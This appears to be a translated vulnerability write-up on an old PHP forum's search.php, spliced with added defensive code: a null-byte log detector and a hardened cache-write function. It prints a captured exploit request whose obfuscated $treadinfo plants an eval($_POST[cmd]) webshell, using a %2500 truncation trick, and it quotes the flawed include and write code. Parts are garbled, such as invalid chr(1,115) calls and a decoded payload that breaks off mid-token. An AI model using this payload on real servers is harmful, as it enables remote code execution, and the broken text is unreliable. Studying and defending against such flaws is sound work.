I saw similar tools on the Internet, but I couldn't find any analysis articles. I heard from Tom that there was a write-up in Hacker's Manual; unfortunately, I didn't even have a copy of the magazine. So I captured the packets, read the code, and wrote a rough analysis. This vulnerability is clever and classic :)
    GET /search.php?keyword=By%20CN911&cachefile=an85.php%2500&treadinfo=<?fputs(fopen(chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(98).chr(98).chr(1,115).chr(1,100).chr(97).chr(1,116).chr(97).chr(47).chr(99).chr(1,110).chr(57).chr(49).chr(49).chr(46).chr(1,112).chr(1,104).chr(112),w),chr(60).chr(63).chr(32).chr(1,101).chr(1,118).chr(97).chr(1,108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(1,109).chr(1,100).chr(93).chr(41).chr(59).chr(63).chr(62))?> HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Accept-Language: zh-cn
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: 127.0.0.1
This is the request I captured. It shows three variables: $keyword, $cachefile and $treadinfo. $keyword can be any keyword. $cachefile must be a PHP file name, which is followed by our PHP shell; %2500 is the double-encoded %00 truncation character. $treadinfo is the generated trojan code; I didn't decode it, but I guess it is PHP code that writes a Trojan horse into another PHP file.
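The request above is easy to spot in web-server logs once you know what to look for: a parameter whose value still contains a null byte after it has been URL-decoded one extra time. The following detector is an added example, not code from the original article or from the affected forum software; the access-log lines are constructed for the demo, and find_null_byte_params() is an assumed helper name. It applies the same two decoding steps the vulnerable script effectively performs (the web server's decode into $_GET, then rawurldecode()) and reports any parameter that ends up holding a NUL.

```php
<?php
// Added example (not from the original article): flag requests whose query
// string carries a double-encoded null byte (%2500) or a raw %00, the
// truncation trick analysed above. All log lines below are constructed.

/**
 * Return the names of query parameters whose value contains a NUL byte either
 * after PHP's own decode into $_GET or after one further rawurldecode() pass
 * (the decode the vulnerable script performs). Empty array means clean.
 */
function find_null_byte_params(string $request_uri): array {
    $query = parse_url($request_uri, PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return [];
    }
    $suspicious = [];
    foreach (explode('&', $query) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $once  = rawurldecode($value);   // what $_GET would contain
        $twice = rawurldecode($once);    // what the script's rawurldecode() yields
        if (strpos($once, "\0") !== false || strpos($twice, "\0") !== false) {
            $suspicious[] = rawurldecode($name);
        }
    }
    return $suspicious;
}

// Constructed access-log lines in Apache common log format.
$log_lines = [
    '127.0.0.1 - - [01/Jan/2006:10:00:00 +0800] "GET /search.php?keyword=test&cachefile=abc HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2006:10:00:01 +0800] "GET /search.php?keyword=By%20CN911&cachefile=an85.php%2500&treadinfo=x HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2006:10:00:02 +0800] "GET /search.php?keyword=a%00b HTTP/1.1" 200 512',
];

foreach ($log_lines as $line) {
    // Pull the request target out of the quoted request line.
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        continue;
    }
    $hits = find_null_byte_params($m[1]);
    if ($hits) {
        echo 'ALERT null byte in parameter(s) ' . implode(', ', $hits) . ': ' . $m[1] . "\n";
    }
}
```

Running it prints an alert for the second line (cachefile, via %2500) and the third (keyword, via a raw %00) and nothing for the first. Decoding twice matters: a single decode of %2500 yields the harmless-looking text "%00", which is exactly why the trick slips past filters that only look at $_GET.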
PS: the decoded $treadinfo content is as follows:

    &treadinfo=<?fputs(fop

The above is the analysis of the packet capture. Now let's look at the search.php code and find where the vulnerability is. Line N reads:

    $cachefile = rawurldecode($cachefile);
The rawurldecode function decodes a URL-encoded string; here it is applied to $keyword and $cachefile in turn. rawurldecode is also one of the key functions: once the %00 is delivered through rawurldecode in this way, you can get past GPC=ON on PHP versions below 5.0.
Lines N+N read:

    ...
    $keywordarray = explode("|", $keyword);
    $keycount = count($keywordarray);
    if ($sch_area == "C") {
        include './require/schall.php';
    } elseif ($sch_area == "") {
        for ($j = 0; $j < $keycount; $j++) {
            $keywordarray[$j] .= "|"; /* accurately match the search author */
        }
        include './require/schpart.php';
    } else {
        include './require/schpart.php';
    }
    if (!file_exists("userdata/cache/$cachefile.txt")) {
        showmsg("No content matching your search<br><a href='search.php'>Search again</a></li></ul>");
    }
    ...
Here either schall.php or schpart.php is included. The last lines of both schall.php and schpart.php are:

    if ($treadinfo)
        writeover("./userdata/cache/$cachefile.txt", $treadinfo, "ab");
So whichever file is included, the content of $treadinfo is written to the cache file. Because $treadinfo is never initialized, the request can supply it (the uninitialized-variable / register_globals pattern) with arbitrary shell code, while $cachefile can name a PHP file and the %00 cuts off the trailing .txt. This single line therefore writes the Trojan into a PHP file.
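The two defects above (a file name built from a user value that is decoded after the GPC layer, and a write whose content comes from an uninitialized variable) can both be closed at the write site. The following is an added example of a hardened version, not the forum's own code: CACHE_DIR, safe_cache_path() and write_cache() are assumed names, and the site's writeover() helper is replaced with file_put_contents(). Validation runs after rawurldecode(), so a %2500 that becomes a NUL is rejected instead of truncating the path, and the content is an explicit argument rather than a variable that register_globals could populate.

```php
<?php
// Added example (not from the original article): hardened cache write.
// Assumed names: CACHE_DIR, safe_cache_path(), write_cache().

define('CACHE_DIR', __DIR__ . '/userdata/cache');

/**
 * Validate a user-supplied cache name and return the absolute .txt path to
 * use, or null if the name is rejected. The check runs AFTER rawurldecode(),
 * the same decode the vulnerable script performs, so a double-encoded %2500
 * that turns into a NUL byte is caught here rather than truncating the path.
 * Only [A-Za-z0-9_-] is allowed: no dots, no slashes, no control bytes.
 */
function safe_cache_path(string $raw_cachefile): ?string {
    $name = rawurldecode($raw_cachefile);
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    return CACHE_DIR . '/' . $name . '.txt';
}

/**
 * Append content to the cache file only when the name validates. The content
 * is an explicit parameter; nothing is read from $_GET/$_POST or relies on
 * register_globals, so an uninitialized $treadinfo can no longer be injected.
 */
function write_cache(string $raw_cachefile, string $content): bool {
    $path = safe_cache_path($raw_cachefile);
    if ($path === null) {
        return false;
    }
    if (!is_dir(CACHE_DIR) && !mkdir(CACHE_DIR, 0750, true)) {
        return false;
    }
    return file_put_contents($path, $content, FILE_APPEND | LOCK_EX) !== false;
}

// Demo with constructed inputs, given as PHP would hand them over in $_GET,
// i.e. already decoded once by the web server / PHP layer.
$cases = [
    'abc123'      => 'ordinary cache name',
    'an85.php%00' => '%2500 on the wire -> "%00" in $_GET -> NUL after rawurldecode',
    '../../x'     => 'path traversal',
    "an85.php\0"  => 'literal NUL that arrived unescaped',
];
foreach ($cases as $input => $why) {
    $path = safe_cache_path($input);
    printf("%-16s %-8s (%s)\n", json_encode($input), $path === null ? 'REJECT' : 'accept', $why);
}
```

Only the first case yields a path; the other three return null before any file operation happens. Whitelisting the name is deliberately stricter than stripping NUL bytes: it also removes the "." and "/" that a truncated or traversed name needs, and it keeps the .txt suffix under the script's control rather than the attacker's.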
That is the general process of this vulnerability. Because I read the code in an Internet cafe, I have not tested it in detail and some of the details are not pointed out. If there is an error, please point it out. I also admire the observation of the vulnerability discoverer SAIY. It is indeed a very classic vulnerability :)